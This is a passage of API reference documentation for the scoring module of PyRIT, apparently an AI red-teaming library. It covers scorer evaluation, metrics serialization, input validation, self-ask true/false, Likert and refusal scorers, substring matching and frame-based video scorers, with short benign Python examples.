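Sorting the matched files gives a deterministic row order regardless of filesystem enumeration order.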

ScorerEvaluator

Bases: abc.ABC

A class that evaluates an LLM scorer against HumanLabeledDatasets, calculating appropriate metrics and saving them to a file.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| scorer | `Scorer` | The scorer to evaluate. |

Methods:

evaluate_dataset_async

evaluate_dataset_async(labeled_dataset: HumanLabeledDataset, num_scorer_trials: int = 1, max_concurrency: int = 10) → ScorerMetrics

Run the evaluation for the scorer/policy combination on the given HumanLabeledDataset.

This method performs pure computation without side effects (no file writing). It can be called directly with an in-memory HumanLabeledDataset for experiments that don’t use file-based datasets (e.g., iterative rubric tuning with custom splits).
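
A minimal sketch of trial-based scoring with bounded concurrency, assuming a stub scorer in place of a real one:

```python
import asyncio


async def stub_score_once(text: str) -> float:
    # Stand-in for one scorer call against one response.
    await asyncio.sleep(0)
    return float(len(text) % 2)


async def run_trials(
    texts: list[str], num_scorer_trials: int, max_concurrency: int
) -> list[list[float]]:
    # Score every response num_scorer_trials times, keeping at most
    # max_concurrency scoring calls in flight at once.
    semaphore = asyncio.Semaphore(max_concurrency)

    async def bounded(text: str) -> float:
        async with semaphore:
            return await stub_score_once(text)

    trials = []
    for _ in range(num_scorer_trials):
        trials.append(await asyncio.gather(*(bounded(t) for t in texts)))
    return trials


results = asyncio.run(run_trials(["a", "bb", "ccc"], num_scorer_trials=2, max_concurrency=2))
```

The semaphore is the standard way to cap concurrent LLM scoring requests without serializing them entirely.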

| Parameter | Type | Description |
| --- | --- | --- |
| labeled_dataset | `HumanLabeledDataset` | The HumanLabeledDataset to evaluate the scorer against. |
| num_scorer_trials | `int` | The number of trials to run the scorer on all responses. Defaults to 1. |
| max_concurrency | `int` | Maximum number of concurrent scoring requests. Defaults to 10. |

Returns:

Raises:

from_scorer

from_scorer(scorer: Scorer, metrics_type: Optional[MetricsType] = None) → ScorerEvaluator

Create a ScorerEvaluator based on the type of scoring.

| Parameter | Type | Description |
| --- | --- | --- |
| scorer | `Scorer` | The scorer to evaluate. |
| metrics_type | `Optional[MetricsType]` | The type of scoring, either HARM or OBJECTIVE. If not provided, defaults to OBJECTIVE for true/false scorers and HARM for all other scorers. Defaults to None. |

Returns:

run_evaluation_async

run_evaluation_async(dataset_files: ScorerEvalDatasetFiles, num_scorer_trials: int = 3, update_registry_behavior: RegistryUpdateBehavior = RegistryUpdateBehavior.SKIP_IF_EXISTS, max_concurrency: int = 10) → Optional[ScorerMetrics]

Evaluate scorer using dataset files configuration.

The update_registry_behavior parameter controls how existing registry entries are handled:

| Parameter | Type | Description |
| --- | --- | --- |
| dataset_files | `ScorerEvalDatasetFiles` | Configuration specifying glob patterns for input files and a result file name. |
| num_scorer_trials | `int` | Number of scoring trials per response. Defaults to 3. |
| update_registry_behavior | `RegistryUpdateBehavior` | Controls how existing registry entries are handled. Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS. |
| max_concurrency | `int` | Maximum number of concurrent scoring requests. Defaults to 10. |

Returns:

Raises:

ScorerMetrics

Base dataclass for storing scorer evaluation metrics.

This class provides methods for serializing metrics to JSON and loading them from JSON files.
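
The serialization round trip can be sketched with a stub dataclass (the field names are illustrative, not the real ScorerMetrics schema):

```python
import json
from dataclasses import asdict, dataclass
from pathlib import Path
from tempfile import TemporaryDirectory


@dataclass
class StubMetrics:
    # Illustrative fields only; not the actual ScorerMetrics layout.
    accuracy: float
    f1_score: float

    def to_json(self) -> str:
        # Serialize the dataclass fields to a JSON string.
        return json.dumps(asdict(self))

    @classmethod
    def from_json(cls, file_path: Path) -> "StubMetrics":
        # Rebuild the metrics object from a JSON file on disk.
        return cls(**json.loads(file_path.read_text()))


with TemporaryDirectory() as tmp:
    path = Path(tmp) / "metrics.json"
    path.write_text(StubMetrics(accuracy=0.9, f1_score=0.8).to_json())
    loaded = StubMetrics.from_json(path)
```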

Methods:

from_json

from_json(file_path: Union[str, Path]) → T

Load the metrics from a JSON file.

| Parameter | Type | Description |
| --- | --- | --- |
| file_path | `Union[str, Path]` | The path to the JSON file. |

Returns:

Raises:

to_json

to_json() → str

Convert the metrics to a JSON string.

Returns:

ScorerMetricsWithIdentity

Bases: Generic[M]

Wrapper that combines scorer metrics with the scorer’s identity information.

This class provides a clean interface for working with evaluation results, allowing access to both the scorer configuration and its performance metrics.

Generic over the metrics type M, so:
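
A rough sketch of this wrapper shape, using stub identity and metrics types in place of the real PyRIT ones:

```python
from dataclasses import dataclass
from typing import Generic, TypeVar

M = TypeVar("M")


@dataclass
class StubIdentity:
    # Stand-in for the scorer identity information.
    scorer_type: str


@dataclass
class StubObjectiveMetrics:
    # Stand-in for ObjectiveScorerMetrics.
    accuracy: float
    f1_score: float


@dataclass
class MetricsWithIdentity(Generic[M]):
    # Pairs a scorer's identity with its typed metrics object,
    # so entry.metrics.<field> is statically typed per metrics kind.
    identity: StubIdentity
    metrics: M


entry = MetricsWithIdentity(
    identity=StubIdentity(scorer_type="SelfAskRefusalScorer"),
    metrics=StubObjectiveMetrics(accuracy=0.92, f1_score=0.88),
)
```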

ScorerPrinter

Bases: ABC

Abstract base class for printing scorer information.

This interface defines the contract for printing scorer details including type information, nested sub-scorers, and evaluation metrics from the registry. Implementations can render output to console, logs, files, or other outputs.

Methods:

print_harm_scorer(scorer_identifier: ComponentIdentifier, harm_category: str) → None

Print harm scorer information including type, nested scorers, and evaluation metrics.

This method displays:

| Parameter | Type | Description |
| --- | --- | --- |
| scorer_identifier | `ComponentIdentifier` | The scorer identifier to print information for. |
| harm_category | `str` | The harm category for looking up metrics (e.g., "hate_speech", "violence"). |

print_objective_scorer(scorer_identifier: ComponentIdentifier) → None

Print objective scorer information including type, nested scorers, and evaluation metrics.

This method displays:

| Parameter | Type | Description |
| --- | --- | --- |
| scorer_identifier | `ComponentIdentifier` | The scorer identifier to print information for. |

ScorerPromptValidator

Validates message pieces and scorer configurations.

This class provides validation for scorer inputs, ensuring that message pieces meet required criteria such as data types, roles, and metadata requirements.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| supported_data_types | `Optional[Sequence[PromptDataType]]` | Data types that the scorer supports. Defaults to all data types if not provided. |
| required_metadata | `Optional[Sequence[str]]` | Metadata keys that must be present in message pieces. Defaults to an empty list. |
| supported_roles | `Optional[Sequence[ChatMessageRole]]` | Message roles that the scorer supports. Defaults to all roles if not provided. |
| max_pieces_in_response | `Optional[int]` | Maximum number of pieces allowed in a response. Defaults to None (no limit). |
| max_text_length | `Optional[int]` | Maximum character length for text data type pieces. Defaults to None (no limit). |
| enforce_all_pieces_valid | `Optional[bool]` | Whether all pieces must be valid or just at least one. Defaults to False. |
| raise_on_no_valid_pieces | `Optional[bool]` | Whether to raise ValueError when no pieces are valid. Defaults to False, allowing scorers to handle empty results gracefully (e.g., returning False for blocked responses). Set to True to raise an exception instead. |
| is_objective_required | `bool` | Whether an objective must be provided for scoring. Defaults to False. |
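
The per-piece checks can be sketched roughly as follows (the piece type here is a stub carrying only the fields the checks need, not the real MessagePiece):

```python
from dataclasses import dataclass, field


@dataclass
class StubPiece:
    # Stand-in for a MessagePiece: just the fields the checks below use.
    data_type: str
    role: str
    metadata: dict = field(default_factory=dict)


def is_piece_supported(
    piece: StubPiece,
    supported_data_types: tuple = ("text",),
    supported_roles: tuple = ("assistant",),
    required_metadata: tuple = (),
) -> bool:
    # A piece passes only if its data type, role, and metadata
    # all satisfy the configured requirements.
    return (
        piece.data_type in supported_data_types
        and piece.role in supported_roles
        and all(key in piece.metadata for key in required_metadata)
    )


ok = is_piece_supported(StubPiece(data_type="text", role="assistant"))
bad_role = is_piece_supported(StubPiece(data_type="text", role="user"))
```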

Methods:

is_message_piece_supported

is_message_piece_supported(message_piece: MessagePiece) → bool

Check if a message piece is supported by this validator.

| Parameter | Type | Description |
| --- | --- | --- |
| message_piece | `MessagePiece` | The message piece to check. |

Returns:

validate

validate(message: Message, objective: str | None) → None

Validate a message and objective against configured requirements.

| Parameter | Type | Description |
| --- | --- | --- |
| message | `Message` | The message to validate. |
| objective | `str \| None` | The objective to validate against, if any. |

Raises:

SelfAskCategoryScorer

Bases: TrueFalseScorer

A class that represents a self-ask score for text classification and scoring. Given a classifier file, it scores according to these categories and returns the category that best fits the MessagePiece.

There is also a false category that is used if the MessagePiece does not fit any of the categories.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target to interact with. |
| content_classifier_path | `Union[str, Path]` | The path to the classifier YAML file. |
| score_aggregator | `TrueFalseAggregatorFunc` | The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None. |

SelfAskGeneralFloatScaleScorer

Bases: FloatScaleScorer

A general-purpose self-ask float-scale scorer that uses a chat target and a configurable system prompt and prompt format. The final score is normalized to [0, 1].
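
The normalization step can be sketched as a simple linear rescale from the model's native scale onto [0, 1] (an assumption about the arithmetic, shown for illustration only):

```python
def normalize_to_unit_interval(raw: int, min_value: int = 0, max_value: int = 100) -> float:
    # Map a score from the model's native [min_value, max_value] scale onto [0, 1].
    if not min_value <= raw <= max_value:
        raise ValueError(f"score {raw} outside [{min_value}, {max_value}]")
    return (raw - min_value) / (max_value - min_value)
```

For example, a raw score of 75 on the default 0–100 scale maps to 0.75, and the scale endpoints map to exactly 0.0 and 1.0.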

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target used to score. |
| system_prompt_format_string | `str` | System prompt template with placeholders for objective, prompt, and message_piece. |
| prompt_format_string | `Optional[str]` | User prompt template with the same placeholders. Defaults to None. |
| category | `Optional[str]` | Category for the score. Defaults to None. |
| min_value | `int` | Minimum of the model's native scale. Defaults to 0. |
| max_value | `int` | Maximum of the model's native scale. Defaults to 100. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None, in which case a default validator requiring text input and an objective is used. |
| score_value_output_key | `str` | JSON key for the score value. Defaults to "score_value". |
| rationale_output_key | `str` | JSON key for the rationale. Defaults to "rationale". |
| description_output_key | `str` | JSON key for the description. Defaults to "description". |
| metadata_output_key | `str` | JSON key for the metadata. Defaults to "metadata". |
| category_output_key | `str` | JSON key for the category. Defaults to "category". |

SelfAskGeneralTrueFalseScorer

Bases: TrueFalseScorer

A general-purpose self-ask True/False scorer that uses a chat target and a configurable system prompt and prompt format.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target used to score. |
| system_prompt_format_string | `str` | System prompt template with placeholders for objective, task (alias of objective), prompt, and message_piece. |
| prompt_format_string | `Optional[str]` | User prompt template with the same placeholders. Defaults to None. |
| category | `Optional[str]` | Category for the score. Defaults to None. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None, in which case a default validator requiring text input and an objective is used. |
| score_aggregator | `TrueFalseAggregatorFunc` | Aggregator for combining scores. Defaults to TrueFalseScoreAggregator.OR. |
| score_value_output_key | `str` | JSON key for the score value. Defaults to "score_value". |
| rationale_output_key | `str` | JSON key for the rationale. Defaults to "rationale". |
| description_output_key | `str` | JSON key for the description. Defaults to "description". |
| metadata_output_key | `str` | JSON key for the metadata. Defaults to "metadata". |
| category_output_key | `str` | JSON key for the category. Defaults to "category". |

SelfAskLikertScorer

Bases: FloatScaleScorer

A class that represents a “self-ask” score for text scoring based on a Likert scale. A Likert scale consists of ranked, ordered categories, often on a 5- or 7-point basis, but you can configure a scale with any set of non-negative integer score values and descriptions by providing a custom YAML file.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target to use for scoring. |
| likert_scale | `LikertScalePaths` | The Likert scale configuration to use for scoring. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator for the scorer. Defaults to None. |

SelfAskQuestionAnswerScorer

Bases: SelfAskTrueFalseScorer

A class that represents a self-ask question answering scorer.

Usually, QuestionAnswerScorer should be used, but this scorer can be useful when choices are not sent to the objective target or when more flexibility is needed in determining whether the questions were answered correctly.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target to use for the scorer. |
| true_false_question_path | `Optional[pathlib.Path]` | The path to the true/false question file. Defaults to None, which uses the default question_answering.yaml file. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None. |
| score_aggregator | `TrueFalseAggregatorFunc` | The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. |

SelfAskRefusalScorer

Bases: TrueFalseScorer

A self-ask scorer that detects refusal in AI responses.

This scorer uses a language model to determine whether a response contains a refusal to answer or comply with the given prompt. It’s useful for evaluating whether AI systems are appropriately refusing harmful requests.

The scorer supports two modes via RefusalScorerPaths:

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The endpoint that will be used to score the prompt. |
| refusal_system_prompt_path | `Union[RefusalScorerPaths, Path, str]` | The path to the system prompt to use for refusal detection. Can be a RefusalScorerPaths enum value, a Path, or a string path. Defaults to RefusalScorerPaths.DEFAULT. |
| prompt_format_string | `Optional[str]` | The format string for the prompt with placeholders. Use {objective} for the conversation objective and {response} for the response to evaluate. Defaults to None, in which case "conversation_objective: {objective}\nresponse_to_evaluate_input: {response}" is used. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None. |
| score_aggregator | `TrueFalseAggregatorFunc` | The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. |

SelfAskScaleScorer

Bases: FloatScaleScorer

A class that represents a “self-ask” score for text scoring for a customizable numeric scale.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target to use for scoring. |
| scale_arguments_path | `Optional[Union[Path, str]]` | Path to the YAML file containing scale definitions. Defaults to None, which uses TREE_OF_ATTACKS_SCALE. |
| system_prompt_path | `Optional[Union[Path, str]]` | Path to the YAML file containing the system prompt. Defaults to None, which uses GENERAL_SYSTEM_PROMPT. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator for the scorer. Defaults to None. |

SelfAskTrueFalseScorer

Bases: TrueFalseScorer

A class that represents a self-ask true/false scorer.

Given written descriptions of “true” and “false” (passed as a file or a TrueFalseQuestion), it returns the value that matches either description most closely.

If no descriptions are provided, it defaults to the TASK_ACHIEVED scorer.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| chat_target | `PromptChatTarget` | The chat target to interact with. |
| true_false_question_path | `Optional[Union[str, Path]]` | The path to the true/false question file. Defaults to None. |
| true_false_question | `Optional[TrueFalseQuestion]` | The true/false question object. Defaults to None. |
| true_false_system_prompt_path | `Optional[Union[str, Path]]` | The path to the system prompt file. Defaults to None. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None. |
| score_aggregator | `TrueFalseAggregatorFunc` | The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. |

SubStringScorer

Bases: TrueFalseScorer

Scorer that checks if a given substring is present in the text.

This scorer performs substring matching using a configurable text matching strategy. Supports both exact substring matching and approximate matching.
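
One way to picture the two matching modes (the approximate variant here uses difflib over sliding windows and is only an illustration, not the library's TextMatching implementation):

```python
import difflib


def exact_match(substring: str, text: str, case_sensitive: bool = False) -> bool:
    # Plain containment check, optionally ignoring case.
    if not case_sensitive:
        substring, text = substring.lower(), text.lower()
    return substring in text


def approximate_match(substring: str, text: str, threshold: float = 0.8) -> bool:
    # Slide a window of len(substring) over the text and fuzzy-compare each window.
    n = len(substring)
    if n == 0 or n > len(text):
        return False
    return any(
        difflib.SequenceMatcher(None, substring.lower(), text[i : i + n].lower()).ratio()
        >= threshold
        for i in range(len(text) - n + 1)
    )
```

The approximate check tolerates small typos (e.g., "refusd" for "refuse") that exact containment would miss.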

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| substring | `str` | The substring to search for in the text. |
| text_matcher | `Optional[TextMatching]` | The text matching strategy to use. Defaults to None, which uses ExactTextMatching with case_sensitive=False. |
| categories | `Optional[list[str]]` | Optional list of categories for the score. Defaults to None. |
| aggregator | `TrueFalseAggregatorFunc` | The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Defaults to None. |

TrueFalseAggregatorFunc

TrueFalseCompositeScorer

Bases: TrueFalseScorer

Composite true/false scorer that aggregates results from other true/false scorers.

This scorer invokes a collection of constituent TrueFalseScorer instances and reduces their single-score outputs into one final true/false score using the supplied aggregation function (e.g., TrueFalseScoreAggregator.AND, TrueFalseScoreAggregator.OR, TrueFalseScoreAggregator.MAJORITY).
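
The three aggregation functions reduce to simple boolean folds. Here is an illustrative sketch (the strict-majority rule below is an assumption about MAJORITY's semantics):

```python
def agg_and(values: list) -> bool:
    # True only if every constituent scorer returned True.
    return all(values)


def agg_or(values: list) -> bool:
    # True if any constituent scorer returned True.
    return any(values)


def agg_majority(values: list) -> bool:
    # True if strictly more than half of the scorers returned True (assumed rule).
    return sum(values) * 2 > len(values)
```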

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| aggregator | `TrueFalseAggregatorFunc` | Aggregation function to combine child scores (e.g., TrueFalseScoreAggregator.AND, TrueFalseScoreAggregator.OR, TrueFalseScoreAggregator.MAJORITY). |
| scorers | `list[TrueFalseScorer]` | The constituent true/false scorers to invoke. |

TrueFalseInverterScorer

Bases: TrueFalseScorer

A scorer that inverts a true/false score.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| scorer | `TrueFalseScorer` | The underlying true/false scorer whose results will be inverted. |
| validator | `Optional[ScorerPromptValidator]` | Custom validator. Present for signature compatibility but not used. Defaults to None. |

TrueFalseQuestion

A class that represents a true/false question.

This is sent to an LLM and can be used as an alternative to a YAML file from TrueFalseQuestionPaths.

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| true_description | `str` | Description of what constitutes a "true" response. |
| false_description | `str` | Description of what constitutes a "false" response. Defaults to an empty string, in which case a generic description is used. |
| category | `str` | The category of the question. Defaults to an empty string. |
| metadata | `str` | Additional metadata for context. Defaults to an empty string. |

TrueFalseQuestionPaths

Bases: enum.Enum

Paths to true/false question YAML files.

TrueFalseScoreAggregator

Namespace for true/false score aggregators that return a single aggregated score.

All aggregators return a list containing one ScoreAggregatorResult that combines all input scores together, preserving all categories.

TrueFalseScorer

Bases: Scorer

Base class for scorers that return true/false binary scores.

This scorer evaluates prompt responses and returns a single boolean score indicating whether the response meets a specific criterion. Multiple pieces in a request response are aggregated using a TrueFalseAggregatorFunc (default: TrueFalseScoreAggregator.OR).

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| validator | `ScorerPromptValidator` | Custom validator. |
| score_aggregator | `TrueFalseAggregatorFunc` | The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. |

Methods:

get_scorer_metrics

get_scorer_metrics() → Optional[ObjectiveScorerMetrics]

Get evaluation metrics for this scorer from the configured evaluation result file.

Returns:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate the scores returned by the scorer.

| Parameter | Type | Description |
| --- | --- | --- |
| scores | `list[Score]` | The scores to be validated. |

Raises:

VideoFloatScaleScorer

Bases: FloatScaleScorer, _BaseVideoScorer

A scorer that processes videos by extracting frames and scoring them using a float scale image scorer.

The VideoFloatScaleScorer breaks down a video into frames and uses a float scale scoring mechanism. Frame scores are aggregated using a FloatScaleAggregatorFunc.

By default, uses FloatScaleScorerByCategory.MAX which groups scores by category (useful for scorers like AzureContentFilterScorer that return multiple scores per frame). This returns one aggregated score per category (e.g., one for “Hate”, one for “Violence”, etc.).

For scorers that return a single score per frame, or to combine all categories together, use FloatScaleScoreAggregator.MAX, FloatScaleScorerAllCategories.MAX, etc.

Optionally, an audio_scorer can be provided to also score the video’s audio track. When provided, the audio is extracted, transcribed, and scored. The audio scores are included in the aggregation.
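
The per-category grouping described above can be sketched as follows (the `(category, value)` tuples are simplified stand-ins for real Score objects):

```python
from collections import defaultdict


def aggregate_by_category(frame_scores: list) -> dict:
    # Group (category, value) pairs across frames and keep the
    # maximum value observed per category, mirroring a MAX-by-category policy.
    best = defaultdict(float)
    for category, value in frame_scores:
        best[category] = max(best[category], value)
    return dict(best)


per_category = aggregate_by_category(
    [("Hate", 0.2), ("Violence", 0.7), ("Hate", 0.5), ("Violence", 0.1)]
)
```

Starting each category at 0.0 is safe here because float-scale scores lie in [0, 1].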

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| image_capable_scorer | `FloatScaleScorer` | A FloatScaleScorer capable of processing images. |
| audio_scorer | `Optional[FloatScaleScorer]` | Optional FloatScaleScorer for scoring the video's audio track. When provided, audio is extracted from the video, transcribed to text, and scored; the audio scores are aggregated with the frame scores. Defaults to None. |
| num_sampled_frames | `Optional[int]` | Number of frames to extract from the video for scoring. Defaults to None, which samples 5 frames. |
| validator | `Optional[ScorerPromptValidator]` | Validator for the scorer. Defaults to None, which uses a video_path data type validator. |
| score_aggregator | `FloatScaleAggregatorFunc` | Aggregator for combining frame scores. Use FloatScaleScorerByCategory.MAX/AVERAGE/MIN for scorers that return multiple scores per frame (groups by category and returns one score per category); FloatScaleScorerAllCategories.MAX/AVERAGE/MIN to combine all scores regardless of category (single score with all categories combined); FloatScaleScoreAggregator.MAX/AVERAGE/MIN for simple aggregation preserving all categories (single score with all categories preserved). Defaults to FloatScaleScorerByCategory.MAX. |
| image_objective_template | `Optional[str]` | Template for formatting the objective when scoring image frames. Use {objective} as a placeholder for the actual objective; set to None to not pass an objective to the image scorer. Defaults to _BaseVideoScorer._DEFAULT_IMAGE_OBJECTIVE_TEMPLATE, which provides context about the video frame. |
| audio_objective_template | `Optional[str]` | Template for formatting the objective when scoring audio. Use {objective} as a placeholder; set to None to not pass an objective to the audio scorer. Defaults to None because video objectives typically describe visual content that doesn't apply to audio. |

VideoTrueFalseScorer

Bases: TrueFalseScorer, _BaseVideoScorer

A scorer that processes videos by extracting frames and scoring them using a true/false image scorer.

Aggregation logic (hard-coded):

- Frame scores are aggregated using OR: if ANY frame meets the objective, the visual score is True.
- When audio_scorer is provided, the final score uses AND: BOTH the visual (frame) score AND the audio score must be True for the overall video score to be True.
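
This hard-coded aggregation reduces to a short boolean expression; as an illustrative sketch:

```python
from typing import Optional


def video_score(frame_results: list, audio_result: Optional[bool] = None) -> bool:
    # OR across frames: any single frame meeting the objective
    # makes the visual score True.
    visual = any(frame_results)
    if audio_result is None:
        # No audio scorer configured: the visual result is the final score.
        return visual
    # With an audio scorer, both the visual OR-result and the
    # audio score must be True for the video to score True.
    return visual and audio_result
```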

Constructor Parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| image_capable_scorer | `TrueFalseScorer` | A TrueFalseScorer capable of processing images. |
| audio_scorer | `Optional[TrueFalseScorer]` | Optional TrueFalseScorer for scoring the video's audio track. When provided, audio is extracted from the video and scored; the final score requires BOTH video frames AND audio to be True. Defaults to None. |
| num_sampled_frames | `Optional[int]` | Number of frames to extract from the video for scoring. Defaults to None, which samples 5 frames. |
| validator | `Optional[ScorerPromptValidator]` | Validator for the scorer. Defaults to None, which uses a video_path data type validator. |
| image_objective_template | `Optional[str]` | Template for formatting the objective when scoring image frames. Use {objective} as a placeholder for the actual objective; set to None to not pass an objective to the image scorer. Defaults to _BaseVideoScorer._DEFAULT_IMAGE_OBJECTIVE_TEMPLATE, which provides context about the video frame. |
| audio_objective_template | `Optional[str]` | Template for formatting the objective when scoring audio. Use {objective} as a placeholder; set to None to not pass an objective to the audio scorer. Defaults to None because video objectives typically describe visual content that doesn't apply to audio. |